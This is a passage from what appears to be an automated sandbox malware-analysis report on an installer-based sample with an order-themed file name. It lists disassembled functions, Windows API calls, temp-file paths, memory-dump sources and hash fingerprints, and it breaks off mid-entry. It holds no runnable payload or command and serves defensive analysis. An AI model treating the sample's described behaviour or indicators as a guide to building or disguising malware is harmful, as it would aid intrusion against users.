                                                                  • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
                                                                  • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                  • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                                                  Function 00406CDA Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                  • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                                                  • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                  • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                                                  Function 004067DF Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                  • Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
                                                                  • Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                  • Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55
                                                                  Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                  • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                                                  • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                  • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                                                  Function 00406D4B Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                  • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                                                  • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                  • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45
                                                                  Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                  • Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
                                                                  • Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                  • Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45
                                                                  Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll), ref: 00405359
                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 334405425-0
                                                                  • Opcode ID: 2e81291ab1750a8fcd1384059b07b9b97ccca7af317ac7dc5ac2b78b9278ec22
                                                                  • Instruction ID: 97d29300f9396016dda5dc64ca85157dedbc1c92ed1374a350dd7f5d7f4d946c
                                                                  • Opcode Fuzzy Hash: 2e81291ab1750a8fcd1384059b07b9b97ccca7af317ac7dc5ac2b78b9278ec22
                                                                  • Instruction Fuzzy Hash: BE21AF31D00205AACF20AFA5CE4899E7A70AF04358F60413BF511B11E0DBB98981DA6E
                                                                  Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalFree.KERNEL32(00814998), ref: 00401BE7
                                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree
                                                                  • String ID: Call
                                                                  • API String ID: 3394109436-1824292864
                                                                  • Opcode ID: 7af67f2b39b2e1d4e89bd13aa3b917542ebe5618f9bf55d236d5d1ccadbbb379
                                                                  • Instruction ID: c71429250c0cafa7b5cd6a02bb6544c1a7146a0c31e36a2bf00ca42990a6d084
                                                                  • Opcode Fuzzy Hash: 7af67f2b39b2e1d4e89bd13aa3b917542ebe5618f9bf55d236d5d1ccadbbb379
                                                                  • Instruction Fuzzy Hash: 6E215472600141EBDB20FB94CE8595A73A4AB44318729057FF502B32D1DBB8A8919BAD
                                                                  Function 6FBC2A74 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileA.KERNELBASE(00000000), ref: 6FBC2B33
                                                                  • GetLastError.KERNEL32 ref: 6FBC2C3A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 1214770103-0
                                                                  • Opcode ID: 0a9687c50f4e5f0afb6106cb20eab0450c75180bb3d9e09c7515272c0c022d98
                                                                  • Instruction ID: 0dd4e73ae91f1b71eb5efddd0548ce387bb2a146c3f92ab34230a575cf37af80
                                                                  • Opcode Fuzzy Hash: 0a9687c50f4e5f0afb6106cb20eab0450c75180bb3d9e09c7515272c0c022d98
                                                                  • Instruction Fuzzy Hash: 4F519D76444784DFDF24DFA5E940B9F37B4FB09328F11646AE805CB280C734A5A2CB56
                                                                  Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsu92B7.tmp,00000000,00000011,00000002), ref: 00402557
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3356406503-0
                                                                  • Opcode ID: 78cb46a17e4604e5fda0a3152fe399088287bee99fe32485d92fc9a21df269c8
                                                                  • Instruction ID: d0975296e26d4c0b9efdbcb6ea02913ec0c3a4f45bebf2ca255a38b3541a69e3
                                                                  • Opcode Fuzzy Hash: 78cb46a17e4604e5fda0a3152fe399088287bee99fe32485d92fc9a21df269c8
                                                                  • Instruction Fuzzy Hash: CF11A731D14205EBDF14DF64CA585AE77B4EF44348F20843FE445B72D0D6B85A41EB5A
                                                                  Function 00405C61 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                    • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C12
                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                  • lstrlenW.KERNEL32(00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405CBA
                                                                  • GetFileAttributesW.KERNELBASE(00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405CCA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                  • String ID:
                                                                  • API String ID: 3248276644-0
                                                                  • Opcode ID: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
                                                                  • Instruction ID: 2026245c43f0ab98faeafd35ab7c4279b053bc85bc29d2cdff443752a8830806
                                                                  • Opcode Fuzzy Hash: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
                                                                  • Instruction Fuzzy Hash: 54F0F436109F511AF62233361D09EAF1648CE82328B5A057FF952B26D1CA3C89039CBE
                                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                  • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                                  • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                  • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                                  Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnableShow
                                                                  • String ID:
                                                                  • API String ID: 1136574915-0
                                                                  • Opcode ID: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
                                                                  • Instruction ID: 63871ab535fe988d3adb25008cf832d4d85dc6cfcdc2aab035335d2457ba8122
                                                                  • Opcode Fuzzy Hash: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
                                                                  • Instruction Fuzzy Hash: 2BE0D832E08200CFE724DFA5AA4946D77B4EB80314720447FF201F11D1CE7848418F6D
                                                                  Function 0040665E Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                    • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                    • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                                    • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2547128583-0
                                                                  • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
